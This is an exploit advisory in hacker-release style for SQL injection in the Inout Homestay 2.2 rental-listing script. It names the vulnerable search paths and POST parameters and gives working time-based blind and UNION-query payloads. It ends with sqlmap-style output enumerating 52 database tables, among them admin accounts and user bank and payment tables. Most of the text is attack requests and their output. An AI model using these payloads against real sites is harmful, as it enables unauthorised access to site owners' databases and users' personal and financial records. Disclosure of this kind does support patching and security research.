++—————————————————————————————+
|| C r a C k E r ++
++ T H E C R A C K O F E T E R N A L M I G H T ||
+—————————————————————————————++
+—- Unimaginable Crack …. —-+
++—————————————————————————————+
++ [Vulnerability] ++
+—————————————————————————————++
CraCkEr is the Author
| Website : inoutscripts.com |
Vendor : Inout Scripts – Nesote Technologies Private Limited
Software : Inout Homestay 2.2
| Vuln Type: SQL Injection |
Impact : Database Access
| |
|—————————————————————————————-|
| ++
+—————————————————————————————++
: :
Release Notes:
| ————- |
| |
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company’s reputation. |
| |
++—————————————————————————————+
++ ++
+—————————————————————————————++
Greets:
Raz0r and The_PitBull.
CryptoJob (Twitter) twitter.com/CryptozJob
++—————————————————————————————+
CraCkEr 2023 (c) ++
+—————————————————————————————++
Path: /index.php?page=search/searchdetailed
broom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=Indianapolis
SQLI vulnerability to the POST parameter “broom”
SQLI vulnerability to the POST parameter “bathr”
SQLI vulnerability to the POST parameter “beds”
SQLI vulnerability to the POST parameter “numguest”
Path: /index.php?page=search/rentals
location=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=Indiana
SQLI vulnerability to the POST parameter “guests”
—
Parameter: Broom (POST).
Type: Time-based blind
Titular: MySQL >= 5.12.12 AND time-based blind. (query SLEEP).
Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split
Type: UNION query
Title: Generic UNION query (NULL) – 27 columns
Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL– -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split
—
MySQL is the back-end DBMS. [INFO]
Back-end DBMS MySQL >= 5.0.12
[INFO] Fetching tables from a database: ‘*****_homestay
Database: *****_homestay
[52 tables]
+———————————-+
| admin_account |
| admin_payment_details |
| category_property |
| chat_details |
| chat_messages |
| checkout_ipn |
countries
| coupon_detail |
| cron_details |
| custom_field |
| demo_message |
| email_details |
| email_templates |
forgetpassword
| host_rejected |
| inout_ipns |
languages
| list_date_request |
| list_images |
| listing_date |
| listing_detail |
| listing_main |
| message_notify_app |
messages
| msg_req_temp |
| ppc_currency |
| public_side_media_detail |
| public_slide_images |
| refund_creditupdate |
| request_coupon_detail |
settings
| superhost_detail |
| traveller_bank_deposit_history |
| traveller_cancellation_modes |
| traveller_cancelled |
| user_account_detail |
| user_address_verify_request |
| user_details |
| user_email_verification |
| user_listing_request |
| user_refunddetails |
| user_registration |
| user_reviews |
| user_search_details |
| user_settings |
| user_wishlist_mapping |
| user_withdrawal_details |
| userabusereport |
| userbank_pending_listing_request |
| usercancellationsaction |
| wish_list |
| withdrawal_request |
+———————————-+
[-] Done
